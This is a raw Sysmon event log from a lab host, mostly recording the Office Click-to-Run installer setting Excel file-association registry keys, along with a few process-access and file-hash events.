13241300x800000000000000075546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 13241300x800000000000000075545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.827{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excelhtmlfile\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" 10341000x800000000000000075544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.827{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE5-607E-220D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\ViewProtected\ddeexec\(Default)(Empty) 13241300x800000000000000075542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\Printto\ddeexec\(Default)(Empty) 13241300x800000000000000075540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" /j "%%2" 10341000x800000000000000075539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.795{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE5-607E-220D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.795{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE5-607E-220D-00000000BB01}1388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 13241300x800000000000000075535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\OpenAsReadOnly\ddeexec\(Default)(Empty) 13241300x800000000000000075534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /h "%%1" 13241300x800000000000000075533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.780{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\New\ddeexec\(Default)(Empty) 13241300x800000000000000075530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.780{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 13241300x800000000000000075529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.780{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\Edit\ddeexec\(Default)(Empty) 13241300x800000000000000075528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.780{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetBinaryMacroEnabled.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 23542300x800000000000000075527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.780{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=641AD4973243CDF4377FE5845CA3C380,SHA256=8E95C5062B9EC008A9D6577A338C41103C63A86AA11D38989A0BCDC6904FEDCE,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000075526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\ViewProtected\ddeexec\(Default)(Empty) 13241300x800000000000000075525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\Printto\ddeexec\(Default)(Empty) 13241300x800000000000000075523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" /j "%%2" 13241300x800000000000000075522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 10341000x800000000000000075520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.748{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE5-607E-210D-00000000BB01}4240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\OpenAsReadOnly\ddeexec\(Default)(Empty) 13241300x800000000000000075518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /h "%%1" 13241300x800000000000000075517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\New\ddeexec\(Default)(Empty) 13241300x800000000000000075514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 10341000x800000000000000075513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.733{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE5-607E-210D-00000000BB01}4240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.733{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE5-607E-210D-00000000BB01}4240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\Edit\ddeexec\(Default)(Empty) 13241300x800000000000000075510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 13241300x800000000000000075509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Macrosheet\shell\ViewProtected\ddeexec\(Default)(Empty) 13241300x800000000000000075508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Macrosheet\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Macrosheet\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Macrosheet\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 13241300x800000000000000075505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Macrosheet\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Macrosheet\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Macrosheet\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" 13241300x800000000000000075502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.686{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Macrosheet\shell\Edit\ddeexec\(Default)(Empty) 13241300x800000000000000075501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.686{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Macrosheet\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 13241300x800000000000000075500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.XLL\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.XLL\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Backup\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Backup\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Backup\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 13241300x800000000000000075495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Backup\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Backup\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Backup\shell\Edit\ddeexec\(Default)(Empty) 13241300x800000000000000075492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Backup\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 13241300x800000000000000075491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.AddInMacroEnabled\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.AddInMacroEnabled\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Addin\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Addin\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.608{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SLK\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.608{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SLK\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\rqyfile\shell\Edit_Query_in_Notepad\command\(Default)%%SystemRoot%%\System32\notepad.exe "%%1" 